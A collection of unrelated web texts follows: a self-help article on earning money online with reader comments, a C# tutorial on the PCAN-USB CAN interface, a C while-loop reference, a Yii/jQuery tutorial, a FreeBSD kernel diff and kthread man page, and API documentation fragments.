Supply and Demand - Getting the most out of your value
One thing to keep in mind is Supply and Demand. Whatever your skills and interests are, someone has to want them. And how much they will be willing to pay you for them depends on how many people already know what you know, or do what you do. So to provide the most Value Out (and therefore the most money) look for things you have that the world really needs, and doesn't have a lot of people supplying. What do people need? Can you supply that in some way? By focussing on things that are hard to come by, you can zoom in on the stuff that the world will pay you the most for.
The other part of that idea is that by focussing on approaches that give back to you in ways that are important to you (the big stuff on your Value In list), you'll be zooming in on things that will matter the most to you. Usually, it's a trade-off between what you want to do and what the world would like to have done for it... but it doesn't have to be that way. Not if you think creatively about yourself, the world, and how those goals can overlap. Preferably, overlap three or four of them.
Tools - Ways to apply that value
We're almost
finished. You're thinking about what you have, what you need, what the
world will pay for, and what the world needs. We have one final thing
to consider, and that's Tools. You can have the best ideas in the
world ("I want to make money writing articles!"), but if you don't know
what Tools exist to allow you to do that, like HubPages and Helium,
you're not going to get very far with it. Sometimes, you'll know your
skills and what the world would like, but you won't find any way to
bring them together until you hear about a Tool that will do that for
you - which is what happened with me and internet article writing. I
knew I was good with English, I knew I had a lot of ideas, but I didn't
know there were sites that paid for articles. Sometimes having the
Tools can make all the difference in the world. (Tip: This makes Tools
very valuable to people, and means that there can be great opportunities
providing access to, and awareness of, Tools to people who need them.
Information swapping in terms of opportunities is a lot of what HubPages
itself does, and that's only one way to exchange your knowledge of
Tools for value.)
So we're going to look for Tools for a moment. Google is a great way to do that. Almost anything can be sold on the internet, even experience and knowledge - look at HubPages. While you're unlikely to find people looking to pay you over the internet for your ability to juggle, you may find that people will pay you for most of your Value Out items in various ways. Paid web design. Paid coding jobs. Actually, if you could juggle and were willing to invest a little money, the internet probably would pay you to juggle - as an entertainer or clown at special events. It's all a matter of thinking creatively, and using the right Tools. Definitely search Google for your interests, and maybe add "jobs" as well.
Don't get discouraged if you can't think of a great approach right away. Now that you've looked at it, boiled it down into what really matters to you, and what the world has and needs, it will percolate through the back of your mind and you'll start getting ideas over the next few days and weeks. Give it time, and keep thinking about it.
Overlapping - Getting two bites at the cherry
One last note - you can maximize what the world will pay you for by finding ways to Overlap many items in your Value Out list together - finding ways to supply your combined talents and skills in unique ways that few others will be able to compete against you to supply. That will make what you choose to do worth more, because any Demand for it will be almost impossible to fill. And by Overlapping items in your Value In list, finding things that satisfy more of them at once, and the more important ones among them, you will find opportunities that are more personally enjoyable and rewarding to you. Often, you can Overlap items from both lists into the same concept, and that's when it gets really fun. Play Mix 'n' Match with them, and see what ideas click in your head from looking at them together. Could there possibly be something out there that will pay you for your interest in Writing, your Love of Solitude, your Need for Rent-Free Living, and your desire to be Out In Nature? (Absolutely! Join the Forestry service, work as a forest-fire lookout in a remote forestry station, and upload articles to HubPages with a satellite modem.) What about getting paid for your interest in Food, People-Watching, and Website Design? (Sure thing! Create a website, become an online restaurant critic, pay users for reviews of restaurants around the world and compile it into a book you can sell online, or a compilation that travel guide editors would buy from you.) Think of it as a game, a challenge to Overlap the most things in your lists. A few minutes more at the start trying to do that could ultimately spell the difference between pursuing something that makes you some money and interests you just a little bit, and doing something that makes you a lot of money and that you love every moment of! Ideally, with enough thinking you'd be able to Overlap everything in both lists... but it's unlikely.
But with enough thought, you can Overlap enough of the big ones that you have a great time, and are enormously successful as well. But when you're looking at your Value In list, be sure to remember that it's not just your own life that matters to you - everyone cares about the state of the world, too. Looking for options that will benefit someone else, and you, and help make the world a better place too will be much more rewarding, and as long as you're making money anyway it will be a gift you can give the world that reminds people of just what an awesome person you are. And all it takes is a few more minutes playing with approaches until you have some that satisfy you, someone else, and brings value to the world as a whole. A few minutes of Overlapping, and the world's a much better place for it.
Phone a friend
Oh - and if you're having a really tough time Overlapping an impossible-seeming set of attributes, try posting them in your Comments here, and check back to see if other readers have any ideas you may have overlooked. Group brainstorming can be tremendously powerful - you might even try asking your friends to look at your list, too....
This is really excellent. I'm sorry it took me so long to read it. I looked at the title when you first posted it and thought, "oh no, not another do-nothing-and-get-rich-on-the-internet article!" But that isn't what you are saying here at all. You are right, we do have some common interests!
Hi, great hub, very enlightening. I also do internet marketing and it is very viable and alive just as you described. I can't wait to read more
Glenda
Thank you so much Satori. Your article is helpful and truthful. However, I just wanted to ask you for some help, if you can. Also, everybody who reads my comments is more than welcome to give me their opinions. I know I like to help people, and I know I can help them through my writings, songs and speeches. Life has taught me lessons that would be valuable to other people. I have learned a lot through fairy tales that my family taught me when I was young, and I am sure they are unknown to the public. However, I have no idea on how to make money on them because I do not know who would like them. I thought about putting all my short stories together and trying to make them published as a book, but the idea was overwhelming for me. So, I did some researches and submitted one part of my fairy tale story on this web. It was rated 68 and I even do not know what that means. Do you have more information on how this web works? What could I do make money on this website. I have many kinds of short stories to submit, but I do not know if it is the right thing to do. I am doing some researches right know and trusting God to guide me exactly when he needs me in his work, and I have hope.
Thank you so much,
Vera
Satori, I have to spend some time looking at this great hub again, and again. You gave some powerful points. I like what you're talking about - you will be seeing more of me if that's OK, I have a habit of sticking with the winners. Here is a little motivator, tell me what you think. I am sure the readers will relate.....
Peace, Love, Health, Happiness and Massive Success ...JosephDiego
Nice hub from a nice bloke.
Thanks Satori, I agree with your thoughts on life generally. We need to help if we can, and we can all help. Some of the best things in life may not be free, but they feel free when they come from a free heart.
This is the second hub of yours that I have read and now I know that I will be reading more. Thumbs up!
you just make someone day great
I salute your ability to sift out useful info and get your readers thinking. You are an excellent writer. I need help with the website building, I can learn and build one but I want to take time out to do that in the future.Right now I need a website to call my own and do one or two stuffs in. So do help me and let me know how u can help me make payment for the 110mb account as I do not reside in the US. Thanks
Nicely written. I agree with your principles. Great hub.
Cool hub!!!
Nice work. Thanks for sharing..
CAN Interface for USB with PCAN, Software and Demo
This article is a tutorial on accessing the PEAK-System PCAN-USB CAN interface from C# code. The PEAK-System PCAN-USB adapter is an established product that comes with drivers and example code. That code was the inspiration for a C# software library to allow for quick integration into a .NET project. A download of the library to interface to the PCAN-USB adaptor is provided, along with a demo program.
A Brief Introduction to CAN
The Controller Area Network (CAN) is a digital data bus used to transfer sensor readings and actuator values between computers and microcontrollers in many types of systems. It was invented by Bosch for use in cars but is now used in other transport systems, buildings and factory automation. Its popularity is due to its simplicity (just two wires), low cost and reliability. The data speed is low by today's standards, commonly up to one megabit per second (1 Mb/s). Five hundred kilobits per second (500 kb/s) is often seen in vehicles. For long cable lengths low speeds are required (less than 125 kb/s). For links to detailed resources on the CAN protocol, and information on CAN bus wiring see the article CAN Bus Wiring Diagram, a Basics Tutorial.
The PEAK-System hardware CAN interface, the software that PEAK provides, and the library provided here, means that a .NET app is easily connected to a CAN bus. Whilst lower cost USB to CAN interfaces are available, the support from PEAK and the performance of their products means they are widely used.
The PEAK-System PCAN-USB Interface Wiring
The PCAN adaptor comes with a standard USB connection for attaching to a laptop or desktop computer. The connection to CAN is via a 9-way D-type plug. The pinouts match the common CiA 303-1 specification. See the CAN Bus Wiring Diagram article. Note, some single board computers and Arduino CAN adapters do not follow the usual CiA CAN wiring. If using the PEAK USB adapter on some of those devices, check the device information to ensure correct wiring. The PCAN-USB manual available from the PEAK-System support page contains information on the PCAN-USB D-type connector. For basic CAN operation, CAN high (pin 7) and CAN low (pin 2) are wired to the corresponding CAN high and CAN low pins of the other devices on the bus.
A CAN data bus requires a termination resistor at each end to absorb signal energy. This prevents the signal from reflecting back along the two wires and interfering with subsequent data transmissions. The termination resistance is typically 120 ohms. The PEAK-System PCAN-USB manual has details on enabling the termination internally in the PCAN-USB device.
The PEAK-System PCAN Software
- PCAN-View, a program used to verify that PCAN-USB devices are working, and to perform basic CAN traffic capturing, viewing and analysis. (Copy PcanView.exe from the pcanview.zip download.)
- A variety of Application Programming Interfaces (APIs), in the form of Windows DLLs, are available (e.g. XCP, ISO-TP, UDS, etc.). The starting point (as used in the software provided here) is the PCAN-Basic API, accessed via PCANBasic.dll which can be installed with the drivers, or download the pcan-basic.zip.
The PEAK-System PCAN-USB sample for C# is a WinForms program, so it shows how to add PCAN-USB support to a C# project. To simplify the process, a DLL project has been developed that can be dropped into a .NET solution. The PCAN-USB interface is then accessed via a C# class. This makes the PCAN-USB device immediately available for use in a new project.
A PEAK-System PCAN-USB Library and Demo
Note: Please consider the software as beta. It is your responsibility to ensure that the software will not cause you any issues.
The C# class to interface with PCAN-USB is available from GitHub, in the project called PCAN_for_USB. If you don't want to clone the project, it can be downloaded from here as a zip file, or via the GitHub zip file link.
Once the zip file is extracted, or the project cloned, the demo program can be tried. However, it will require the PEAK-System PCAN-USB drivers to be installed, along with the PCANBasic.dll (see above). Another CAN device will be required to form a CAN network. It you have two PCAN-USB devices they can be used to talk to each other.
The Visual Studio solution file is PCAN_For_USB.sln. Open the solution, it should build and run when the Start/Run button is pressed.
PCAN-USB Interface Software Demo UI
The PCAN-USB interface C# class comes with a demo program. The Windows Forms (WinForms) UI demo is called PCAN_USB_UI. If a PEAK-USB hardware adaptor is not plugged into the computer the message Plug in a PEAK PCAN USB Adapter will be displayed. To use the demo program:
- Select the PCAN-USB device from the list of detected devices.
- Select the correct or required baud rate.
- Click the Start button.
- A standard eight byte message can be transmitted, and received messages are displayed.
The code for the UI demo should be easy enough to understand, and helps to see how the PCAN_USB class is used.
Reusing the PCAN_USB Class
To reuse the PCAN_USB class add the project to a new solution (or add a reference to the compiled DLL). For example copy the PCAN_USB project to the new solution folder. (It is good practice to change the ProjectGuid.) In Microsoft Visual Studio add the PCAN_USB project to the solution using the Add and Existing Project menu options. Add the reference to PCAN_USB in the project that will be using the PCAN_USB class.
The class to interface to the PCAN-USB adaptor is called PCAN_USB, in the CAN.PC namespace:
using System.Windows.Forms;
using CAN.PC;

namespace MyCANProject
{
    public partial class Form1 : Form
    {
        PCAN_USB pCAN;

        public Form1()
        {
            InitializeComponent();
            //Layer between C# program and PEAK interface DLL
            pCAN = new PCAN_USB(this);
        }
    }
}
The plugged in PCAN-USB devices are returned with the GetUSBDevices() method:
private void Form1_Load(object sender, EventArgs e)
{
    List<string> PeakUSBDevices = pCAN.GetUSBDevices();
    if (PeakUSBDevices != null)
        listBox1.Items.AddRange(PeakUSBDevices.ToArray());
}
Possible baud rates are provided in a string array:
listBox2.Items.AddRange(PCAN_USB.CANBaudRates);
The PEAK-System API uses an unsigned short integer to reference a PCAN-USB device; use DecodePEAKHandle to extract it from the string displayed in the list.
UInt16 handle = 0; //PCAN handles are ushorts
if (listBox1.SelectedIndex > -1)
    handle = pCAN.DecodePEAKHandle(listBox1.Items[listBox1.SelectedIndex].ToString());
Use WriteFrame to send a CAN message:
private void button2_Click(object sender, EventArgs e)
{
    //Data buffer is a fixed size, here 8 bytes for standard CAN
    //Number of bytes sent determined by a data length code (DLC)
    byte[] data = new byte[8];
    //Set an id (0 to 2047 for standard CAN)
    UInt32 id = 0x7ff;
    //Set the number of bytes to send, here 3 bytes
    int length = 3;
    // Set the data
    data[0] = 0x01;
    data[1] = 0x02;
    data[2] = 0x03;
    //Send a three byte message
    pCAN.WriteFrame(id, length, data);
}
The PCAN_USB Packet class stores the data from a received CAN packet:
public class Packet
{
    //PEAK uses a struct for passing to the PEAK dll
    public ulong Microseconds { set; get; }
    public uint Id { set; get; }
    public byte Length { set; get; }
    public byte[] Data { set; get; }
    //Index for displaying in list boxes
    public int DisplayIndex { get; set; } = -1;
}
Received CAN packets are stored in a PCAN_USB list:
public List<Packet> Packets { get; set; } = new List<Packet>();
Use the usual Count for a List to get the number of packets in the buffer:
label2.Text = pCAN.Packets.Count.ToString();
Received packets overwrite the last packet with the same id, unless this behaviour is turned off:
//Don't overwrite received packets
pCAN.OverwriteLastPacket = false;
A list box can be updated automatically as packets are received. Note: This feature has not been optimized for performance.
//Update a list box as packets are received
pCAN.ReceivedMessages = listBox3;
When finished with a PCAN-USB adaptor call Uninitialize().
private void Form1_FormClosing(object sender, FormClosingEventArgs e)
{
    //Close any open channels
    pCAN.Uninitialize();
}
See Also
- CAN Bus Wiring Diagram, a Basics Tutorial
- PCAN-USB devices loopback test
- For a full list of the articles on Tek Eye see the full site Index
Author: Daniel S. Fowler Published:
while loop
Executes a statement repeatedly, until the value of expression becomes equal to zero. The test takes place before each iteration.
Syntax

while ( expression ) statement
Explanation
A while statement causes the statement (also called the loop body) to be executed repeatedly until the expression (also called controlling expression) compares equal to zero. The repetition occurs regardless of whether the loop body is entered normally or by a goto into the middle of statement.
The evaluation of expression takes place before each execution of statement (unless entered by a goto). If the controlling expression needs to be evaluated after the loop body, the do-while loop may be used.
If the execution of the loop needs to be terminated at some point, a break statement can be used as the terminating statement; without such a break, while(true) is an endless loop.
Notes
Boolean and pointer expressions are often used as loop controlling expressions. The boolean value false and the null pointer value of any pointer type compare equal to zero.
Keywords

while
Example
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum { SIZE = 8 };

int main(void)
{
    // trivial example
    int array[SIZE], n = 0;
    while(n < SIZE)
        array[n++] = rand() % 2;
    puts("Array filled!");
    n = 0;
    while(n < SIZE)
        printf("%d ", array[n++]);
    printf("\n");

    // classic strcpy() implementation
    // (copies a null-terminated string from src to dst)
    char src[]="Hello, world", dst[sizeof src], *p=dst, *q=src;
    while(*p++ = *q++)
        ; // null statement
    puts(dst);
}
Output:
Array filled!
1 0 1 1 1 1 0 0
Hello, world
You are viewing revision #4 of this wiki article.
This tutorial presents a way of separating JS code from views and passing to it values from PHP.
Yii provides two helpful ways of keeping JavaScript code close to the widgets and other elements they interact with:
- strings prefixed with 'js:'
- CClientScript.registerScript method
Quickly, small snippets of JavaScript code turn into big ugly strings filled with PHP variables and without proper syntax highlighting.
This tutorial shows a method of organizing JavaScript code and integrating it with a PHP backend.
jQuery plugin template
This template for building JavaScript plugins is proposed by jQuery:
(function( yourPluginName, $, undefined ) {
    // public method
    yourPluginName.someCallback = function() {
    };
}( window.yourPluginName = window.yourPluginName || {}, jQuery ));
This defines a function that is immediately called and passed two arguments:
- a reference to window.yourPluginName
- the jQuery object
This allows you to extend the global yourPluginName object by adding methods and properties to it, keeping them all in one scope.
Now you can place your bulky JS code from your views inside this plugin and call it as yourPluginName.someCallback(). By defining your functions inside this plugin you keep them in a limited scope and thus create a namespace for it. That helps avoid name conflicts and keeps your code cleaner.
Another important feature is that this plugin can be registered many times. Sometimes this can happen when you load an action through AJAX on a page that has already registered the script.
This also allows extending it further, adding more functions.
Also, since there actually is a limited scope, strict mode can be enabled:
(function( yourPluginName, $, undefined ) {
    // guard to detect browser-specific issues early in development
    "use strict";

    // private var
    var _settings;

    // public var
    yourPluginName.someProperty = 'default value';

    // public method
    yourPluginName.someCallback = function() {
    };
}( window.yourPluginName = window.yourPluginName || {}, jQuery ));
The '_settings' var is private and can only be referenced inside functions defined in yourPluginName.
On Thu, Aug 15, 2002 at 07:11:05AM -0500 I heard the voice of dmk, and lo! it spake thus:
>
> Is anybody successfully using the port emulators/rtc with vmware2 on
> -current?
[...]
Replying to myself... I have since hacked rtc so it works with vmware2 on my -CURRENT system dated February 4, 2002. In the shocking case that anyone is interested, I have attached the diff. (I would appreciate anybody looking at the diff as it is my first kernel hack.)

> Thanks loads,
> dan
--- rtc.c.bk	Thu Aug 15 03:50:21 2002
+++ rtc.c	Thu Aug 15 03:51:30 2002
@@ -177,9 +177,8 @@
 rtc_open(dev_t dev, int oflag, int otyp, struct proc *p)
 #endif
 {
-	struct rtc_softc *sc;
+	struct rtc_softc *sc = (struct rtc_softc *) dev->si_drv1;
 
-	sc = rtc_attach(dev);
 	if (sc==NULL)
 		return (EAGAIN);
@@ -264,7 +263,21 @@
 static int
 init_module(void)
 {
-int error;
+	int error;
+	struct rtc_softc *sc;
+	dev_t dev;
+
+	dev = make_dev(&rtc_cdevsw, 0, UID_ROOT, GID_WHEEL, 0600, DEVICE_NAME);
+	if(dev==NULL)
+		return (NULL);
+
+	MALLOC(sc, struct rtc_softc*, sizeof(*sc), M_DEVBUF, M_WAITOK);
+	if(sc==NULL)
+		return NULL;
+
+	bzero(sc, sizeof(*sc));
+	rtc_sc = sc;
+	dev->si_drv1 = sc;	/* Link together */
 
 	error = cdevsw_add(&rtc_cdevsw);
 	if (error)
#include <VrmlData_IndexedLineSet.hxx>
Data type to store a set of polygons.
Empty constructor.
Constructor.
Query the array of color indices
Create a copy of this node. If the parameter is null, a new copied node is created. Otherwise new node is not created, but rather the given one is modified.
Reimplemented from VrmlData_Node.
Query the Colors.
Query the Coordinates.
Query a color for one node in the given element. The color is interpreted according to fields myColors, myArrColorInd, myColorPerVertex, as defined in VRML 2.0.
Returns True if the node is default, so that it should not be written.
Reimplemented from VrmlData_Node.
Query one polygon.
Query the array of polygons
Read the Node from input stream.
Implements VrmlData_Node.
Set the array of color indices
Set the boolean value "colorPerVertex"
Set the Color node
Set the nodes
Set the polygons
Query the shape. This method checks the flag myIsModified; if True it should rebuild the shape presentation.
Implements VrmlData_Geometry.
Write the Node to output stream.
Reimplemented from VrmlData_Node. | https://dev.opencascade.org/doc/occt-7.0.0/refman/html/class_vrml_data___indexed_line_set.html | CC-MAIN-2022-33 | refinedweb | 167 | 61.63 |
NAME
kproc_start, kproc_shutdown, kthread_create, kthread_exit, kthread_resume, kthread_suspend, kthread_suspend_check - kernel threads
SYNOPSIS
#include <sys/kthread.h> void kproc_start(const void *udata); void kproc_shutdown(void *arg, int howto); int kthread_create(void (*func)(void *), void *arg, struct proc **newpp, int flags, int pages, const char *fmt, ...); void kthread_exit(int ecode); int kthread_resume(struct proc *p); int kthread_suspend(struct proc *p, int timo); void kthread_suspend_check(struct proc *p);
DESCRIPTION threadthread_create() function is used to create a kernel thread. The new thread shares its address space with process 0, the swapper process, and runs in kernel mode only. The func argument specifies the function that the thread thread’s stack in pages. If 0 is used, the default kernel stack size is allocated. The rest of the arguments form a printf(9) argument list that is used to build the name of the new thread and is stored in the p_comm member of the new thread’s struct proc. The kthread_exit() function is used to terminate kernel threads. It should be called by the main function of the kernel thread rather than letting the main function return to its caller. The ecode argument specifies the exit status of the thread. While exiting, the function exit1(9) will initiate a call to wakeup(9) on the thread handle. The kthread_resume(), kthread_suspend(), and kthread_suspend_check() functions are used to suspend and resume a kernel thread. During the main loop of its execution, a kernel thread that wishes to allow itself to be suspended should call kthread_suspend_check() passing in curproc as the only argument. This function checks to see if the kernel thread has been asked to suspend. If it has, it will tsleep(9) until it is told to resume. Once it has been told to resume it will return allowing execution of the kernel thread to continue. The other two functions are used to notify a kernel thread of a suspend or resume request. The p argument points to the struct proc of the kernel thread to suspend or resume. For kthread_suspend(), the timo argument specifies a timeout to wait for the kernel thread to acknowledge the suspend request and suspend itself. The kproc_create(), kthread_resume(), and kthread_suspend() functions return zero on success and non-zero on failure.
EXAMPLES
This example demonstrates the use of a struct kproc_desc and the functions kproc_start(), kproc_shutdown(), and kthreadthread_suspend_check(bufdaemonproc); ... } }
ERRORS
The kthread_resume() and kthread_suspend() functions will fail if: [EINVAL] The p argument does not reference a kernel thread. The kthread), SYSINIT(9), wakeup(9)
HISTORY
The kproc_start() function first appeared in FreeBSD 2.2. The kproc_shutdown(), kthread_create(), kthread_exit(), kthread_resume(), kthread_suspend(), and kthread_suspend_check() functions were introduced in FreeBSD 4.0. Prior to FreeBSD 5.0, the kproc_shutdown(), kthread_resume(), kthread_suspend(), and kthread_suspend_check() functions were named shutdown_kproc(), resume_kproc(), shutdown_kproc(), and kproc_suspend_loop(), respectively. | http://manpages.ubuntu.com/manpages/intrepid/man9/kproc_start.9freebsd.html | CC-MAIN-2013-20 | refinedweb | 458 | 54.52 |
On Thursday 04 June 2009 05:01:49 pm Peter Robinson wrote: > >> Can someone suggest how I should do this? I'm not sure who put this in > >> my spec file! > >> > >> # for eggs > >> %if 0%{?fedora} >= 8 > >> BuildRequires: python-setuptools-devel > >> %else > >> BuildRequires: python-setuptools > >> %endif > >> > >> Is it safe to drop the conditional now and always expect > >> python-setup-devel to be there? > > > > If you're not building for EPEL 4/5, yes. > > Do EPEL pick up the fedora >= 8 conditional? > > Peter epel defines a %{rhel} macro to 4 or 5 when rhel6 comes whenever that is hopefully it will have defined in redhat-release the macros defineing %{rhel} = 6 probably a better way to do the above example is %if 0%{?fedora} <= 8 || 0%{?rhel} <= 5 BuildRequires: python-setuptools %else BuildRequires: python-setuptools-devel %endif that way if the macros are not defined the newer package is required not the older way. Dennis
Attachment:
signature.asc
Description: This is a digitally signed message part. | https://www.redhat.com/archives/fedora-devel-list/2009-June/msg00376.html | CC-MAIN-2015-22 | refinedweb | 165 | 57.87 |
Simple Kubernetes setup with Traefik 2.0.0 and DOK8s
Stepan Vrany
・7 min read
Literally a few hours ago Containous has released a beta release of awesome Traefik edge proxy. Let's try to deploy an easy setup on DigitalOcean's mananaged Kubernetes platform DOK8s.
Big changes in the ingress specification
First of all I'd like to summarize the most visible change: ingress routes are no longer being specified by the Ingress resource. Instead, there's a set of new CRDs which you can use to precisely set the behaviour of your ingress routes.
So in the version 2 you don't have to put all the advanced configuration into the object annotations which is conclusively a good step forward. Great job!
Let's start with the base infrastructure
I don't want to waste time making screenshots. This is not the way how we should treat a modern infrastructure. Instead I've prepared super easy Terraform manifest which creates all the components in like 5 minutes.
There's also one super positive aspect of infrastructure as a code principle - you can destroy or create it whenever you want. It's extremely useful for playground environments when you really don't want to pay vast amount of 💵 💵 💵
Enough talking. This is the infrastructure "recipe"
resource "digitalocean_tag" "kubernetes-cl01" { name = "kubernetes-cl01" } resource "digitalocean_kubernetes_cluster" "cl01" { name = "cl01" region = "fra1" version = "1.14.4-do.0" node_pool { name = "default" size = "s-2vcpu-2gb" node_count = 3 tags = ["${digitalocean_tag.kubernetes-cl01.id}"] } } resource "digitalocean_certificate" "stepanvrany-cz" { name = "le-stepanvrany-cz" type = "lets_encrypt" domains = ["admin.stepanvrany.cz", "stepanvrany.cz"] } resource "digitalocean_loadbalancer" "kubernetes-cl01-public" { name = "kubernetes-cl01-public" region = "fra1" enable_proxy_protocol = false redirect_http_to_https = true forwarding_rule { entry_port = 80 entry_protocol = "http" target_port = 30101 target_protocol = "http" } forwarding_rule { entry_port = 443 entry_protocol = "http2" target_port = 30101 target_protocol = "http" certificate_id = "${digitalocean_certificate.stepanvrany-cz.id}" } healthcheck { port = 30103 protocol = "http" path = "/ping" } droplet_tag = "${digitalocean_tag.kubernetes-cl01.id}" } resource "digitalocean_firewall" "kubernetes-cl01-public" { name = "kubernetes-cl01-public" tags = ["${digitalocean_tag.kubernetes-cl01.id}"] inbound_rule { protocol = "tcp" port_range = "30101" source_load_balancer_uids = ["${digitalocean_loadbalancer.kubernetes-cl01-public.id}"] } } resource "digitalocean_record" "admin-stepanvrany-cz" { domain = "${data.digitalocean_domain.stepanvrany-cz.name}" type = "A" name = "admin" value = "${digitalocean_loadbalancer.kubernetes-cl01-public.ip}" }
and this is how the "recipe" comes true:
export TF_VAR_do_token=<your DO token> terraform init terraform plan terraform apply -auto-approve
See the full example in my GitHub repository.
Attention: In the example I'm using my custom domain
stepanvrany.cz. This repository is not intended to be plug&play solution so it won't work when you run it without further adjustment.
Kubernetes preparation works
Now we need to install Traefik edge router to our Kubernetes cluster. As I've stated before, Traefik's behavior is no longer managed via Ingress objects but via CRDs so it's a good time to create them. --- apiVersion: v1 kind: ServiceAccount metadata: namespace: default name: traefik-ingress-controller
kubectl apply -f kubernetes/traefik/traefik-prereqs.yaml
Alongside with CRDs we've also deployed another required components such as
ClusterRoleBinding,
ClusterRole and
ServiceAccount. As we are basically extending base Kubernetes functionality, this is a must - Traefik needs some level of access to the Kubernetes API.
Now we can deploy Traefik itself. And this it the reason why we deployed some communication/security rules before. Traefik is basically just a common Deployment which communicates with the Kubernetes API and adjusts its configuration on the fly to match your requirements defined in the custom Kubernetes objects.
This
Let's go through some configuration flags. This Traefik instance will have only one entrypoint for plain HTTP traffic as the TLS termination is done in the DigitalOcean Load Balancer. It listens on port :8000 and we've also configured it to accept all forwarded headers. There's also
--ping part which enables
/ping endpoint we've configured as the Health Check on the Load Balancer.
Such insecure configuration will be just fine in the private testing/development infrastructure but overall it's not a good idea. Please bear that in mind.
As you can see, it also has API enabled (on the default port 8080) so that's why we have two entries in the
ports property - we want to access API or web interface from the outer world.
That's actually a good coincidence that I've just talked about the outer world. It's a good time to think about accessing Traefik from the already configured Load Balancer. In this certain scenario, the most effective way is to use NodePort method. That's why I pre-configured Load Balancer to forward all traffic to TCP port
30101. This port belongs to the dedicated NodePort range so it was perfectly fine to chose one port and configure it on both sides.
This means that when we deploy NodePort service with statically configured NodePort - Load Balancer will be able to communicate with the Traefik Pods through the each Cluster's node.
And here we go, this is the service:
apiVersion: v1 kind: Service metadata: name: traefik spec: type: NodePort ports: - protocol: TCP name: web port: 8000 nodePort: 30101 - protocol: TCP name: admin port: 8080 nodePort: 30103 selector: app: traefik
Now we can access Traefik's HTTP entrypoint and admin interface on ports
30101 and
30103. Sweet.
Please note that we've put the administration interface there only because we need to access
/pingendpoint from the Load Balancer. The actual administration interface will be exposed to the outer world via IngressRoute resource.
Exposing the administration interface
Oh yeah, we could expose the administration interface directly via Load Balancer but there's no point in doing it like that. Load Balancer does not support all the cool features that Traefik does so let's just expose it as all other future services.(`admin.stepanvrany.cz`) && PathPrefix(`/`) kind: Rule priority: 1 services: - name: traefik-admin port: 8080
In the Service object we're basically exporting the same service as we've exported before under a different name. That's not absolutely necessary but let's do it like that 😂
And finally you can see the custom Traefik resource for the ingress route. It's pretty similar to good old Ingress resource but this is just a tip of the iceberg.
Let's deploy these resources and see what happens.
Oh, that's great! I can access the administration interface from the outer world. But wait, it means that the interface can be accessed by anyone ... that's not the desired state, right?
Middlewares for the win!
Of course it's not the desired state. And here comes the next custom Traefik resource: middleware. By using middlewares we can simply adjust the behaviour of the ingress route. There's a vast of middlewares for all the common situations you can encounter in the real life such as redirects, rewrites or basic auth. And basic auth is the middleware we're gonna use.
apiVersion: traefik.containo.us/v1alpha1 kind: Middleware metadata: name: admin-auth spec: basicAuth: users: - admin:$apr1$1nzs8OB2$po4LalWDMglIs8FzuMsAU0
Basic Auth uses standard htpasswd mechanism so you just need to install apache2 utils and then you can generate as many password hashes as you need.
Now we just need to deploy
admin-auth middleware and adjust the
traefik-admin ingress route object like this:
apiVersion: traefik.containo.us/v1alpha1 kind: IngressRoute metadata: name: traefik-admin spec: entryPoints: - web routes: - match: Host(`admin.stepanvrany.cz`) && PathPrefix(`/`) kind: Rule priority: 1 middlewares: - name: admin-auth services: - name: traefik-admin port: 8080
When we open
admin.stepanvrany.cz we'll be asked for user and password 🎊 Administration interface is (somehow) protected against the rogue users and we can sleep calm. This is the state we were fighting for 😂
Wrap
Compared to the version 1 Traefik 2 is still extremely reliable and superfast edge proxy with a lot of new features (such as TCP load balancing not covered in this post) and rich extensible resources without confusing annotations we know from all other ingress controllers.
To me this is a huge step forward and I'm really looking forward for the final release. Engineers from Containous have done great work and I am very thankful for that!
Any questions? Do not hesitate to leave a comment below. Or you can even reach me out on Twitter!
How did I started learning a new technology
Personnal view of how and why I learned a new technology
Thank you for writing this post! I'm (we're) glad you enjoy the new features :-)
❤️
I'm in love with Traefik and cannot wait to try version 2, thanks for this!
Hi Adrian. I'm head of community for Traefik. Thanks for saying this 👆🏼! Pls join us at our upcoming meetup with Michael Irwin if you'd like: zoom.us/webinar/register/WN_RYmIKU.... And, if you're not yet at the forum, we'd ❤️if you join us there, also! community.containo.us. -- Patricia | https://practicaldev-herokuapp-com.global.ssl.fastly.net/mstrsobserver/simple-kubernetes-setup-with-traefik-2-0-0-and-dok8s-38ep | CC-MAIN-2019-35 | refinedweb | 1,478 | 54.32 |
Extend Client - Auto discovery and re-connectionuser10714864 Feb 1, 2013 3:09 AM
Couple of questions on version 3.7.1 of coherence, we have a scenario where a client is configured with only one proxy server address (let us say A), but we have more than one proxies (B, C and D) running in the cluster (four proxies and 4 cache nodes)..
This content has been marked as final. Show 3 replies
1. Re: Extend Client - Auto discovery and re-connectionBretCalvey Feb 4, 2013 4:21 PM (in response to user10714864)Hi,1 person found this helpful
We use 3.7.1.5 and have extend clients that use CQCs
What we found was that if a connection to a proxy is lost, you have to manually refresh any CQCs that you have set up (when a reconnection happens).
This does not happen magically, you have to deal with this case yourself.
The way to detect when you've lost a connection to the proxy from the client is by registering a "Member Listener" on the client, for example...
public class MyClass implements MemberListener {
@Override
public void memberJoined(MemberEvent event) {
// Called when a connection has been (re-)established
}
@Override
public void memberLeaving(MemberEvent event) {
// Called when proxy is shutting down
}
@Override
public void memberLeft(MemberEvent event) {
// Called when connection is lost
}
}
In our application, if we get a "Member Left" event, we start to return "Service Unavailable" HTTP status codes (this takes the node out of our load balancer - if all our nodes lose the connection, then we are in trouble!!)
We then try and refresh each NamedCache and CQC (by recreating them). When we manage to do this without an error, then we can assume that the connection is OK again and we start processing requests as usual.
Not sure if there is any other way of doing this!
Hope this helps...
2. Re: Extend Client - Auto discovery and re-connectionuser10714864 Feb 10, 2013 10:57 PM (in response to BretCalvey)Thanks for the reply, yes, that's been our observation too.
However, we were trying to test if specifying only one proxy IP in our cache-config xml on the client side, when we have a total of 4 available, and kill the specified proxy and see what happens.
We were expecting the client to connect to the remaining proxies on a subsequent "get/put", it worked, but when we captured the member left event and re-registered our map listeners, the events were coming fine, but they were throwing errors everytime they receive an update/insert event, not sure why the exceptions were being logged, despite everything working otherwise.
We were wondering if this is the expected behavior, or are we missing something?
3. Re: Extend Client - Auto discovery and re-connectionuser123799 Feb 12, 2013 12:18 PM (in response to user10714864)Hi user,
Can you give more details of the exceptions you are seeing? A full coherence log may help clarify things...
Andy | https://community.oracle.com/thread/2495507 | CC-MAIN-2017-17 | refinedweb | 498 | 63.22 |
Dynamic Interaction with Your Web Application
Imagine you are working on a web application. A collection of
servlets, HTML pages, classes, .jars, and other resources is now
shaping into a fully complete application running on a web server.
But something is just not right. Perhaps you are trying to
